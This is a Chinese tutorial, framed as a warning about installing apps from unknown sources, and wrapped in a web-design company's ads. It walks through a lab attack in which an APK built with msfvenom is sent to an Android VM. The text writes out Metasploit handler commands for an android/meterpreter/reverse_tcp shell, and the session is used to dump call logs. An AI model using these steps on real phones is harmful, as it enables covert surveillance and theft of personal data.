如何使用Metasploit對安卓手機進行控制

本篇文章為大家展示了如何使用Metasploit對安卓手機進行控制,內(nèi)容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

創(chuàng)新互聯(lián)建站長期為上千客戶提供的網(wǎng)站建設(shè)服務(wù),團隊從業(yè)經(jīng)驗10年,關(guān)注不同地域、不同群體,并針對不同對象提供差異化的產(chǎn)品和服務(wù);打造開放共贏平臺,與合作伙伴共同營造健康的互聯(lián)網(wǎng)生態(tài)環(huán)境。為龍里企業(yè)提供專業(yè)的成都網(wǎng)站設(shè)計、成都網(wǎng)站建設(shè),龍里網(wǎng)站改版等技術(shù)服務(wù)。擁有10年豐富建站經(jīng)驗和眾多成功案例,為您定制開發(fā)。

如何使用Metasploit對安卓手機進行控制

現(xiàn)在大家每天的生活都離不開一樣?xùn)|西——手機。手機上的App給我們的生活帶來了許多歡樂與便利,讓我們足不出戶便能知曉天下事。然而,并不是所有App都是為我們服務(wù)的,有些App可能會帶著惡意去接近我們。如果你的程序是從官方應(yīng)用商店下載還比較安全,若是從未知來源,如網(wǎng)上論壇,或者他人轉(zhuǎn)發(fā)等“不靠譜”的下載鏈接安裝,那就比較危險了。所以大部分安卓手機在你設(shè)置“允許安裝未知來源App”時都會彈出如下提醒:

如何使用Metasploit對安卓手機進行控制

別小看這一道“防護欄”,他有可能會替你擋下一波又一波惡意App的進攻。也許你可能會不以為然的關(guān)掉它:我只是裝個App而已,它又不會偷我的錢。

下面,我就會以一個惡意攻擊者的角度來告訴你,未知來源的App有多危險!

環(huán)境:

攻擊機:Kali

靶機(受害者):FreeBSD安卓4.4.2虛擬機

過程:

首先我們查看并記錄Kali的ip地址:192.168.1.112.

如何使用Metasploit對安卓手機進行控制

利用Kali下的msfvenom生成惡意APK,也就是安卓程序的安裝包,LHOST為Kali的ip,LPORT可隨意選擇一個不用的端口。

如何使用Metasploit對安卓手機進行控制

成功生成一個apk,我們先把它放著。再啟動metasploit的監(jiān)聽器,打開msfconsole控制臺(吐槽一句,為什么好多Kali下的程序都搞這么花哨的歡迎界面,大佬的世界我不懂)。

如何使用Metasploit對安卓手機進行控制

打開后,分別輸入:

use exploit/multi/handler

set Payload android/meterpreter/reverse_tcp

set LHOST 192.168.1.112

set LPORT 4444

如何使用Metasploit對安卓手機進行控制

這樣,就設(shè)置好了攻擊模塊、Payload、接收反彈連接主機的監(jiān)聽端口等,便可以開始攻擊了。

輸入exploit,等待結(jié)果。

如何使用Metasploit對安卓手機進行控制

現(xiàn)在,我們開始模仿受害者,通過電子郵件收到了一個未知來源的apk,名稱為“hh.apk”。

如何使用Metasploit對安卓手機進行控制

開始安裝,他并沒有提示我“未知來源“,可能是因為這個安卓版本比較久遠了,那時還沒有現(xiàn)在這樣的信息安全保護意識吧。

如何使用Metasploit對安卓手機進行控制如何使用Metasploit對安卓手機進行控制

這樣,安裝完成,我們已經(jīng)不知不覺的踏入了“攻擊者“的陷阱中。點擊應(yīng)用程序,發(fā)現(xiàn)并沒有什么響應(yīng)。但其實,我們此時已經(jīng)被攻擊者掌控住了。

如何使用Metasploit對安卓手機進行控制

如圖所示,就是受害者已經(jīng)被監(jiān)控的提示,圖中192.168.1.100就是安卓機的ip地址。

如何使用Metasploit對安卓手機進行控制

在這個頁面下,攻擊者基本可以操控手機的全部功能、竊聽或查看手機的全部文件。舉個例子來說,上圖中的“dump_call log“指令就是下載了安卓機的所有通話記錄,并生成一個TXT文檔。

如何使用Metasploit對安卓手機進行控制

這是我模擬手機,撥打三家通信運營商的通話記錄,分別是10001、10086和10010。從圖中可以清楚的看到撥打號碼、通話時間與撥打接聽方式。當然,能做的事遠不止這些。

上述內(nèi)容就是如何使用Metasploit對安卓手機進行控制,你們學(xué)到知識或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識儲備,歡迎關(guān)注創(chuàng)新互聯(lián)行業(yè)資訊頻道。

本文題目:如何使用Metasploit對安卓手機進行控制
當前URL:http://muchs.cn/article24/jejcje.html

成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供服務(wù)器托管用戶體驗、Google、移動網(wǎng)站建設(shè)、電子商務(wù)、響應(yīng)式網(wǎng)站

廣告

聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時需注明來源: 創(chuàng)新互聯(lián)

成都seo排名網(wǎng)站優(yōu)化